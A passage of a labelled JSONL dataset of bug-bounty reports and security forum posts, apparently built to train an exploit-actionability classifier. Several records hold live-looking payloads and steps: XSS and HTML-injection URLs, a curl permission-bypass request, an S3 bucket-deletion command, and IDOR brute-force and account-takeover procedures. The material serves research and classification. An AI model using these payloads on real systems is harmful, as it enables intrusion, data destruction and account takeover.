Numbers\n\n\n## Steps to Reproduce\nNavigate to https://████████/████████████████████████=%22%3E%3Csvg/onload=alert(1)%3E██████████\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "90f43165aa1f8af45b5f", "text": "[Unknown] Logging in without knowing credentials after logged out action\n\nHi, I noticed weird behavior about logging in when preparing last report for you.\nRepro steps: Log in using incognito/private mode on https://weblate.org/pl/ - click top right https://hosted.weblate.org/accounts/login/?next=/idp/login/process/ and use password-username.\nAs logged in on https://weblate.org/pl/ now log out - click top right icon (Logging out). Now logged out on https://weblate.org/pl/\nBut now, click again icon \nSee logged in without interaction - like type password/credentials.\n\nAdditional information:\nChecked with different browsers like Firefox and Chromium based.\nYou can many times logging out and just clicking icon (steps above) - be logged in.\n\nBest regards,\n\n## Impact\n\nScenario: user logging out so thinks is properly logged out, next person just clicks mentioned icon and is logged in as previous user without knowing credentials.\nPossible sensitive data exposure / ATO.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "cfe01b96cf817f99fedc", "text": "[Unknown] [Java]: Add JDBC connection SSRF sinks\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ca91b083dd342d275fbd", "text": "[Privilege Escalation] Subdomain takeover at http://test.www.midigator.com\n\n## Vulnerability\nSubdomain test.www.midigator.com points to an AWS S3 bucket that no longer exists. I was able to take control of this bucket and serve my own content on it.\n\n## Proof Of Concept\n```code\n$ dig test.www.midigator.com\n[snipped]\n;; ANSWER SECTION:\ntest.www.midigator.com.\t60\tIN\tCNAME\ttest.www.midigator.com.s3-website-us-west-1.amazonaws.com.\ntest.www.midigator.com.s3-website-us-west-1.amazonaws.com. 59 IN CNAME s3-website-us-west-1.amazonaws.com.\ns3-website-us-west-1.amazonaws.com. 4 IN A\t52.219.193.3\n```\n\n{F1963195}\n\n## Remediation\nRemove the CNAME entry for the `test.www.midigator.com`\n\n## Impact\n\nSubdomain Takeover", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "5aa20979ce2dfb625d52", "text": "[Unknown] Yet another SSRF query for Go\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "684dfc36c319dbb3824d", "text": "[Unknown] HTML injection through Invite Teammate email\n\n## Summary:\nI found HTML injection on domain https://platform.securityscorecard.io/ when we send invite teammate email. In this case \"message\" parameter is vulnerable.\n\n## Steps To Reproduce:\n\n 1. Go to page ( https://platform.securityscorecard.io/ ) and login.\n 2. Now go to page https://platform.securityscorecard.io/#/scorecard/wearehackerone.com/factors . Click on \"Invite Teammate\".\n 3. Fill the details first-last name, email and put below payload in \"message\" parameter\n\">

HTML INJECTION

Click me\n 4. Now when invited teammate see email , he will see executed html in email .\n\nVideo is attached as poc.\n\n## Impact\n\n1) Attacker could redirect users and control them easily .\n2) Could steal the credentials .", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "adc2bcf59cf1727f2492", "text": "[Information Disclosure] New Search Feature: Search for non-public words in limited disclosure reports\n\nSimilar to https://hackerone.com/reports/685909\nAn attacker can search for words in limited disclosure reports, and see if it exists in the full report. HackerOne will return whether the word exists in the full report, rather than in the limited part (e.g. summary/title ...) of the report\n\n### Steps to reproduce:\nHave the new beta search feature enabled:\n1. Search for \n`addProjectV2ItemById AND reporter:(\"ahacker1\")`\nNote that there is a hit for the phrase in the limited disclosure report (https://hackerone.com/reports/1711938) even though the word cannot be publicly found in the limited disclosure report.\n\n(This phrase is only the full report, not in the limited disclosure report)\n## Impact\n\nFor example, if there is a secret inside the full report (but not inside the limited portion), the attacker could leak it with a lot of tries.\nSuppose secret starts with PREFIX_\n\nthen attacker could search for:\nPREFIX_a\nPREFIX_b\n...\nuntil it matches in the report\nPREFIX_k\n\nthen the attacker could continue\nsearching for\nPREFIX_ka\nPREFIX_kb\nPREFIX_kc\n...\nuntil a match\nPREFIX_ko\nThis could be continued on until the attacker hits the end of the secret, therefore leaking the secrets.\n\nThe number of tries would take around:\naround 30 chars to try in each iteration * 40 (average length of a secret) \n= 1200 tries", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "80e77931c14ecb37d93e", "text": "[Unknown] [C#] CWE-759: Query to detect password hash without a salt\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "87bc82aeaa7d81e3c2ac", "text": "[Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)] Html injection\n\n## Issue Description\nHypertext Markup Language (HTML) injection is a technique used to take advantage of non-validated input to modify a web page presented by a web application to its users. Attackers take advantage of the fact that the content of a web page is often related to a previous interaction with users. When applications fail to validate user data, an attacker can send HTML-fomatted text to modify site content that gets presented to other users. A specifically crafted query can lead to inclusion in the web page of attacker-controlled HTML elements which change the way the application content gets exposed to the web. \n\n## Issue Identified\nThe consultant identified that the `show` parameter can reflect into the html page, the outline below demonstrates the steps taken to exploit and reproduce.\n## Risk Breakdown\n- Risk: **Medium**\n \n- Difficulty to Exploit: **Medium**\n \n- CVSS:3.1 Score: **5.4** [(/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)\n\n## Affected URLs\n - https://www.wikichat.fr\n\n\n## Exploit Link\n ```html\n https://www.wikichat.fr/trouver-lalimentation-adaptee-chat/?show=pedbaq%22%3E%3Ch1%3Especial%20offer%20%3Ca%20href=https://google.com%3Emalicious%20link%3C/a%3E%3C/h1%3E%3Cinput%20type=hidden%20id=%22\n ```\n\n## Steps to Reproduce\nThe following steps indicate a proof of concept outlined in three(2) steps to reproduce and execute the issue.\n\n**Step 1:**\nOpen the `Exploit Link` and you will see the `special offer` with `malicious link` as shown in the image below\n\n![alt text](https://www.uplooder.net/img/image/87/76f9c0358f1f67069b0aeb89de2e0c68/Screenshot-from-2023-07-10-16-40-30.png \"malicious page\")\n\n\n\n**Step 2:**\nWhen the user clicks on the link, redirected to the attacker's site\n\n\n## References\n - [1] [snyk](https://security.snyk.io/vuln/SNYK-JAVA-COMXUXUELI-3248764)\n - [2] [OWASP](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/03-Testing_for_HTML_Injection)\n\n## Impact\n\nFraud and deceiving site users", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2dd25f8c36959c136669", "text": "Introduction to Windows Command Line - Skill Assessment nº9\n\nHi! I cannot pass question nº9 Use the tasklist command to print the started services and then sort them in reverse order by name. The fourth service is the flag for this user. I have tried the following with no luck: Get-Service | Sort-Object -Property Name -Descending Get-Service | Where status -like ‘Running’ | Sort-Object -Property Name -Descending Any tip?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-12-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "cba42258021488a26b86", "text": "[Information Disclosure] Open S3 Bucket Accessible by any User\n\nhi team,\nhere i found Open S3 Bucket Accessible by any User\n\nvulnerable URL:\nhttps://cdn2.omise.co/\n\nbucket name : `omise-cdn-2`\n\nI haven't tried this yet as it may delete the bucket. (it is possible)\nan Attacker can delete the bucket using this command:-\n$ aws s3 rb s3://\nand claim the bucket again to takeover the bucket \n\nhttps://cdn2.omise.co/. (S3 misconfiguration), that allow to any user listing/read/download all folders/files.\n\n\n\ni think somthing misconfiguration is happaening here, u cant read the bucket using Aws Cli but u can read it via browser.\nand also u can download the file using both Aws Cli and Browser.\n\n████████\n\ndownload:\n\n██████\n\n## Impact\n\nSensitive information Leakage.\nan Attacker can delete the bucket .and claim the bucket again to takeover the buckaet", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d7976874d276df2f915b", "text": "[Open Redirect] Open redirection at https://smartreports.mtncameroon.net\n\n## Summary:\nHello, \nI found open redirection on https://smartreports.mtncameroon.net\n\n## Steps To Reproduce:\n1. Go to https://smartreports.mtncameroon.net//example.com/..;/css\n\n2. Redirection to example.com\n\n## Impact\n\nOpen redirection vulnerability can redirect users to malicious sites that harm users", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b3c72333d83696257c1c", "text": "[UI Redressing (Clickjacking)] Clickjacking login page of https://hackers.upchieve.org/login\n\nHello, you have discovered this unprotected login page\nhttps://hackers.upchieve.org/login\nAn attacker can \nin frame page\nin iframe \nand Deception of a user and obtaining a password, email and sensitive information\n\n## Impact\n\nAn attacker can \naDeception of a user and obtaining a password, email and sensitive information", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "567bbe0a281c3f223517", "text": "[Improper Access Control - Generic] Download permissions can be changed by resharer\n\nThe new feature in NC 25 to limit downloads also for internal shares is meant to force users to use secure view. So documents are watermarked and what not.\n\nAssume a company wide share. People can share files from it to others but they can't be downloaded. For simplicity\n\n* user1 shares a folder with reshare permissions but without download permissions to user2. Assume this is a share with ID 10\n* user2 shares that folder with user3, this is a share with ID 11\n\nThis all works as expected\n\nNow user2 simply does a PUT\n\n```\ncurl -u user2:pass 'https://SERVER/ocs/v2.php/apps/files_sharing/api/v1/shares/11' -X PUT -H \"OCS-APIREQUEST: true\" -H 'Content-Type: application/json' --data-raw '{\"permissions\":\"17\",\"attributes\":\"[{\\\"scope\\\":\\\"permissions\\\",\\\"key\\\":\\\"download\\\",\\\"enabled\\\":true}]\"}'\n```\n\nAnd there you go. No more pesky secure view. Just easy downloads for user3.\n\n## Impact\n\nSecure view for internal shares is useless if also reshare permissions are given.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7700f2f09124222b819d", "text": "[Unknown] Is the Google Bucket Meant To Be Publicly Listable? https://cdn.shopify.com/shop-assets/\n\nHi,\n\nI found that https://cdn.shopify.com/shop-assets/ is listing the all objects in https://storage.googleapis.com/arrive-assets-storage-production/\n\nBut when I directly visit https://storage.googleapis.com/arrive-assets-storage-production/, it says \n\n>Anonymous caller does not have storage.objects.list access to the Google Cloud Storage bucket.\n\nSo I wonder maybe it is unintentional that user can directly list all the objects in GCP using the link https://cdn.shopify.com/shop-assets/?\n\nPoC\n\n██████\n\n## Impact\n\nList objects in GCP that should be protected from anonymous users", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "094230e3769512f77f66", "text": "Network adapter for a beginner\n\nHi, I’m a student and I’m just entering the huge world of cybersecurity. At the moment I have a Lenovo Ideapad laptop, and it works decently. Looking at different penetration testing tutorials I see that many recommend to buy a network adapter, so you can have the possibility to use the network card in monitor mode or do packet injection. The laptop’s network adapter can get into monitor mode (unfortunately I have to reboot the computer to get it back into managed mode), but I haven’t tried if it supports packet injection yet. Would you advise me to buy a network adapter, obviously not a very powerful one (at least for now), although it can already do several things? Thanks in advance", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-02-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "465c6f9cb415a85b3910", "text": "[Incorrect Authorization] Incorrect Authorization Checks in /include/findusers.php\n\n## Summary:\nThe vulnerability is located in the `/include/findusers.php` script:\n\n```\n16.\tinclude \"../mainfile.php\";\n17.\txoops_header(false);\n18.\t\n19.\t$denied = true;\n20.\tif (!empty($_REQUEST['token'])) {\n21.\t\tif (icms::$security->validateToken($_REQUEST['token'], false)) {\n22.\t\t\t$denied = false;\n23.\t\t}\n24.\t} elseif (is_object(icms::$user) && icms::$user->isAdmin()) {\n25.\t\t$denied = false;\n26.\t}\n27.\tif ($denied) {\n28.\t\ticms_core_Message::error(_NOPERM);\n29.\t\texit();\n30.\t}\n```\n\nAs far as I can see, I believe this script should be accessible by admin users only (due to line 24). However, because of the if statements at lines 20-23, this script could be accessed by unauthenticated attackers if they will provide a valid security token. Such a token will be generated in several places within the application (just search for the string `icms::$security->getTokenHTML()`), and some of them do not require the user to be authenticated, like in `misc.php` at [line 181](https://github.com/ImpressCMS/impresscms/blob/48af29c6b8150fbf4220bb5cc4f3c57bcd818384/misc.php#L181).\n\n\n\n## ImpressCMS branch :\nThe vulnerability has been tested and confirmed on ImpressCMS version 1.4.2 (the latest at the time of writing).\n\n## Steps To Reproduce:\n 1. Try to access the `/include/findusers.php` script without being logged into the application\n 1. You will see an error message saying **\"Sorry, you don't have permission to access this area.\"**\n 1. Go to `/misc.php?action=showpopups&type=friend` and look at the HTML source code, search the string `XOOPS_TOKEN_REQUEST` and copy the value of the token\n 1. Go to `/include/findusers.php?token=[TOKEN_VALUE]` and you will be able to access the script and e.g. search through the registered users\n\n## Impact\n\nThis vulnerability might allow unauthenticated attackers to access an otherwise restricted functionality of the application, which in turn might allow an information disclosure about the CMS users (specifically, only the username and real name will be disclosed).", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9ca3764495ae660b0aeb", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected cross site scripting in https://███████\n\nIt was observed that the application is vulnerable to cross-site scripting (XSS). XSS is a type of attack that involves running a malicious scripts on a victim’s browser. \n\nrequest.txt attacked \npoc attached\n\n## Impact\n\nCookie Stealing - A malicious user can steal cookies and use them to gain access to the application.\nArbitrary requests - An attacker can use XSS to send requests that appear to be from the victim to the web server.\nMalware download - XSS can prompt the user to download malware. Since the prompt looks like a legitimate request from the\nsite, the user may be more likely to trust the request and actually install the malware.\nDefacement - attacker can deface the website usig javascript code.\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nrun request attached\n\n## Suggested Mitigation/Remediation Actions", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "742136419922c82c5333", "text": "Ctf command\n\nHi there, I’m trying to find some people, who can help me with experience in real CTF. I’m not new in CTF, but I want to see how cool people solve challenges in real CTF, maybe even play CTF with them.))))))", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-07-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3ca832376f33be026452", "text": "[Improper Following of a Certificate's Chain of Trust] Node.js Certificate Verification Bypass via String Injection\n\nThis is a report on behalf of Google, who did not want to report through H1.\n\n---\n\n**Summary**\nNode’s APIs for reporting certificate fields are ambiguous and allow bypassing certificate verification in some circumstances.\n\n**Details**\nIn light of CVE-2021-3712, I’ve been looking at code which misuses OpenSSL’s printing functions. Node’s use will cause it to misparse certificates, and, I believe, allows certificate verification bypasses in some circumstances, such as a name-constrained intermediate. It’s also just a generally unsafe pattern.\n\nFor background, the OpenSSL utility has options like openssl x509 -text which output some human-readable text representation of the certificate. This gives output like:\n\n```\nX509v3 Subject Alternative Name: \n DNS:*.nodejs.org, DNS:nodejs.org\n```\n\nCertificates are not text. They use a structured binary encoding, called DER. Fields may contain commas, spaces, or any other byte. The text representation is just an ad-hoc diagnostic output by OpenSSL. It has no well-defined grammar and does not even escape characters, so the output is ambiguous. It should not be parsed.\n\nOpenSSL has functions for the text format in the library itself. These are X509_print, i2v_GENERAL_NAME, X509V3_EXT_val_prn, X509V3_EXT_print, and others. But, these are still for diagnostics, not a well-defined serialization of the certificate.\n\nUnfortunately, it looks like Node tries to parse this output to interpret the certificate itself:\nhttps://github.com/nodejs/node/blob/95834d11a23b224f1abcc71a868d3cade4763717/src/crypto/crypto_x509.cc#L219\nhttps://github.com/nodejs/node/blob/95834d11a23b224f1abcc71a868d3cade4763717/src/crypto/crypto_x509.cc#L229\nhttps://github.com/nodejs/node/blob/95834d11a23b224f1abcc71a868d3cade4763717/src/crypto/crypto_common.h#L162\nhttps://github.com/nodejs/node/blob/95834d11a23b224f1abcc71a868d3cade4763717/src/crypto/crypto_common.cc#L678\n(Despite the name, SafeX509ExtPrint is not safe.)\nhttps://github.com/nodejs/node/blob/95834d11a23b224f1abcc71a868d3cade4763717/lib/_tls_common.js#L133\nhttps://github.com/nodejs/node/blob/95834d11a23b224f1abcc71a868d3cade4763717/lib/tls.js#L239\n\nThe last instance is especially concerning. If a certificate is issued for, say, \"nodejs.org, DNS:blah.attacker.example\", certificate issuance or verification may reason, “this has .attacker.example as a suffix, which you own, so this certificate is fine”. Meanwhile, Node sees a text output of \"DNS:nodejs.org, DNS:blah.attacker.example\" and misinterprets it as two names, one of which is nodejs.org. Concretely, this may happen if a CA issues a name-constrained intermediate certificate to attacker.example. OpenSSL performs the name constraint check against the correct parse, then Node misinterprets the certificate and bypasses the name constraint.\n\nThis is similar to the old null prefix attack from 11 years ago. Other SAN types may also be injection vectors.\n\nAdditionally, as this is not the intended use, OpenSSL’s print functions receive less attention than other parts of their X.509 stack. Indeed not mentioned in the CVE-2021-3712 advisory is that the print functions silently truncated their outputs on interior NUL bytes. That makes uses like Node’s vulnerable to exactly the old null prefix attack from 11 years ago. (The GEN_DNS special case in SafeX509ExtPrint avoids it for DNS SANs, but other SAN types are still truncated.)\n\nInstead, Node should look at the GENERAL_NAME, etc., structure, which will give you the actual fields unambiguously, or call into the high-level OpenSSL functions that check hostnames.\n\n**Recommendations**\nThis is part of Node’s public API, so the fix may be tricky. Here is a rough roadmap:\n\nFirst, change the private C++/JavaScript interface for subjectaltname and infoAccess from OpenSSL print functions to structured JavaScript objects. Walk the actual structs, rather than using the print functions. I can help review this, as may not be obvious what fields you need, or what che", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2021-3712"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "489f9ce03734efa924e8", "text": "[Improper Authentication - Generic] Account Takeover via SMS Authentication Flow\n\n## Summary:\nDuring the **authentication** flow, an SMS is sent to the user in order to validate the session and proceed to the user account. The way Zenly API handles this flow is by:\n1. Calling the `/SessionCreate` endpoint with the mobile phone number of the user.\n2. A session for the user is created and a session token is returned, but no operations with this session are possible until the verification is complete.\n3. An SMS message is sent to the user, containing a verification code.\n4. Calling the `/SessionVerify` endpoint with both the session token and the verification code received by SMS.\n5. Once this request is successfully completed, the session token becomes valid and the user is now logged in.\nAfter the first call to `/SessionCreate`, subsequent calls will return ==the same session token==, until a call to `/SessionVerify` is made with a valid verification code. \n\n## Steps To Reproduce:\nTo reproduce this issue, an environment that enables intercepting and decoding network requests is required. Once this environment is set up, we are able to gain visibility over network activity.\nBy following a typical login flow, we can gain knowledge of the network requests that are involved. The flow starts by requesting the mobile phone number from the user. Once the user inputs their phone number, they will be prompted for a verification code that is sent through SMS.\n{F1355357}\nAt this moment, before entering the verification code, a request to `/SessionCreate` is launched. Note that this request (on the left) contains the mobile phone number of the user, and the response (on the right) to this request contains a **session token**, as shown below.\n███████\nNow, if an attacker also sends a request to `/SessionCreate` with the mobile phone number of the legitimate user, they will obtain the same session token. The response to this request, initiated by the attacker, is shown below:\n█████████\n**Note:** In this example, the attacker called `/SessionCreate` after the legitimate user. However, the attacker could also have called `/SessionCreate` before the legitimate user. This would have caused Zenly (on the side of the legitimate user) to obtain **the same session token that the attacker obtained**.\nAt this moment, the legitimate user will receive an SMS message containing a verification code. The authentication flow is finished (meaning the session token will become valid) once the user inputs this code in their Zenly application. However, once the user does this, the attacker will also end up with a valid session token in their hands (**since it is the same token**).\nThe attacker can then use this token to impersonate the legitimate user, executing any request to the Zenly API with it. The attacker can also, at any time, check if the session token is valid by launching a request to `/Me`, an endpoint that returns information about the current session. If the verification code has not yet been entered by the legitimate user, requests to `/Me` will return a 401 Unauthorized response. Once the code is entered, requests to `/Me` will return session information (such as phone number and user identifier), as shown below:\n████\nOnce the attacker knows the session is valid, they can launch requests to `███████`, `██████` or `████` instead, thus **gaining access to notifications, geolocation, and conversations** of the legitimate user and their friends. \n\n## Suggested Mitigation:\nIn order to mitigate this issue, the following steps could be taken:\n-\tSession tokens should be unique for each call to `/SessionCreate`.\n-\tA new SMS code should be sent on every call to `/SessionCreate`.\n-\tPrevious SMS codes should be invalidated once a new one is sent.\n-\tApply rate-limiting to both `/SessionCreate` and `/SessionVerify` endpoints.\n\n## Impact\n\nAn attacker can take over a user account by abusing the `/SessionCreate endpoint`, which will consistently return the same session token (although not yet valid) for the same user. Once the legitimate user validates the ", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7c3508916bb791a312c0", "text": "[Code Injection] Dependency confusion in https://github.com/hyperledger/aries-mobile-agent-react-native\n\nHi,\nI found dependency confusion vulnerability in your aries mobile agent. \n\nThe agent is installed through npm which then download thepublic packages required by the application. Those dependencies are defined through the package.json file. I found that your agent depends on the package \"aries-bifold\" that is not currently present in the public repository; an attacker could upload its malicious package and then gain remote code execution on every target installing the agent.\nI limited my research on finding the missing package without uploading the \"malicious\" package on npm because https://github.com/hyperledger/aries-mobile-agent-react-native is not in scope (but is not out-of-scope either), but the methods to exploit this vulnerability are well documented here:\n1) https://dhiyaneshgeek.github.io/web/security/2021/09/04/dependency-confusion/\n\nMore about this vulnerability from the researcher who discovered it:\n2) https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610\n\nCheers,\nr3drush\n\n## Impact\n\nRemote code execution to clients installing the agent", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "aa59ebb5a328d699a73c", "text": "messede:Nice Post !, Keep it Up !I totally agree with what you said.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-06-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "975c55833b7fbfe2d910", "text": "[Insecure Direct Object Reference (IDOR)] Remove Every User, Admin, And Owner Out Of Their Teams on developers.mtn.com via IDOR + Information Disclosure\n\nHello world,\n\nThis vulnerability is too involved with regular users, in order for us to prevent any damage, we need 3 different user accounts we own. \nThis gives us specific \"user_id\" and \"team_id\" to work with.\nThere's an Information Disclosure as a side effect of this vulnerability. User and team names are disclosed in the response from the server.\n\n## Steps To Reproduce(POC)\n\n==First, let's paint a mental picture of this vulnerability and the required conditions using accounts with imaginary user_id & team_id.\nThe vulnerability and conditions are realistic, the only imaginary thing is the user_id and team_id.==\n\n 1. Create 3 accounts on developers.mtn.com(Account A, B, and C)\n\n==My imaginary accounts:==\n- A: First Account(imaginary user_id=1111 & team_id=0001)\n- B: Second Account(imaginary user_id=1112 & team_id=0002)\n- C: Third Account(imaginary user_id=1113 & team_id=0003)\n 2. Login to A, Invite B to your Team A\n 3. Login to B, Invite C to your team B\n 4. Open Burp Suite\n 5. Login to A, Remove B(Please Intercept This Request)\n 6. Send the Intercepted request to the repeater tab\n 7. Modify the request(Our Goal is to remove C from Team B, which we don't have access or permissions to.)\n 8. Replace the team_id with Team B's team_id. Replace the user_id with C's user_id.\n 9. Send the Request. (This Request will disclose C's username And Team B's name. Making this an information disclosure. PII)\n\n{F1577574}\n\n 10. C will be removed from B's Team B.\n 11. C will receive an email from MTN telling him/her that he/she has been removed from Team B.\n\n{F1577544}\n\n## Steps To Reproduce(Removing Every User)\n\n==This can be done with a custom script/code without the need for Burp Suite==\n 1. Intercept the request for removing a user, and send it to the Burp Suite intercept tab.\n 2. Config your settings to brute-force through every team_id and user_id. This part is not that hard because every user_id and team_id has only 4 digits.\n 3. Run the intruder request. When there's a successful user_id and team_id match, the user whose ID has been matched, will be removed.\n 4. If my calculations are correct, it should take 12 Hours to remove every user from every group they're in, the maximum being 20 Hours. The faster the internet speed, the faster the computer, the shorter the time it'll take to brute-force through every user_id and team_id.\n\n## Exploitability\n- Anyone with an account on developers.mtn.com can exploit this vulnerability\n- All you need is a user_id and a team_id to remove a user from his/her team.(Their privileges don't matter, even the owner is vulnerable)\n\n## Remediation\n- Ensure proper session management and object-level user access control checks.\n- Apply access control mechanisms such as permissions to certain action.\n- Validation of access to a team_id.\n- You should always check if a user submitting the request isn't tampering and isn't submitting any ID's that do not belong to his/her account.\n\n## Reference\n#1448475\n\n## Impact\n\nA low level user can remove his Admin and Owner from the team.\nEvery user will be removed from every team they are in, including owners and admins.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d550a260ae9a826c611f", "text": "[Cross-Site Request Forgery (CSRF)] CSRF with logout action\n\nHi, I wanted let you know and saw that previously similar issue was fixed.\nRepro steps: Go to https://weblate.org/pl/ and click top right icon for logging in (user-tab user-anonymous, https://weblate.org/saml2/login/?next=/pl/).\nLog in using username and password (https://hosted.weblate.org/accounts/login/?next=/idp/login/process/). \nLogged in on site https://weblate.org/pl/ use link: https://weblate.org/logout/\nSee logged out.\n\nThe similar result with using external page with prepared CSRF payload like:\n` Click me to see bonus pack`\nHere as logged in user use this link from external page, next go to tab where logged in and refresh the page - see logged out there too.\n\nBest regards,\n\n## Impact\n\nBad actor can affect the user's login status - logged out.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "5c5235e2baaa2fd56663", "text": "AES256-CTR Attack for CTF Challenge\n\nHello, I have a CTF challenge at my university and unfortunately I don’t know what to do next. Here are all the clues: I can enter my student ID and get a cipher text back. Flags have the format {f=XXX}, where XXX consists of 12 pseudo-random characters from the alphabet “0123456789abcdef”. Here is the code that calculates the cipher text: import os from Crypto.Cipher import AES def encrypt(msg): nonce = os.urandom(8) key = os.urandom(32) c = b'' for i in range((len(msg)//16)+1): aes = AES.new(key,AES.MODE_CTR, nonce = nonce) c +=aes.encrypt(msg[16*i:16*(i+1)]) return c plaintext = '''GET / HTTP/1.1\\r\\nHost: ctf.itsc.uni-xxx.de\\r\\nUser-Agent: Mozilla\\5.9 (X11; Ubuntu: Linux x86_64; rv:62.0) Gecko/20100101 Firefox/ 62.0\\r\\nAccept: text/html,application/xhtml+xml,application/xml;qU0.9,*/*;q=0.8\\r\\nAccept-Language: en-US,en;q=0.5\\r\\nAccept-Encoding: gzip, deflate, br\\r\\nConnection: keep-alive\\r\\nCookie: {{f={}}}'''.format(flag) ciphertext = encrypt(plaintext.encode()).hex() The encryption code was implemented in Python3 and the PyCryptoDome library. There is another note that you should pay particular attention to how the counter mode was implemented. Example for student ID 1950243 is the cipher text: 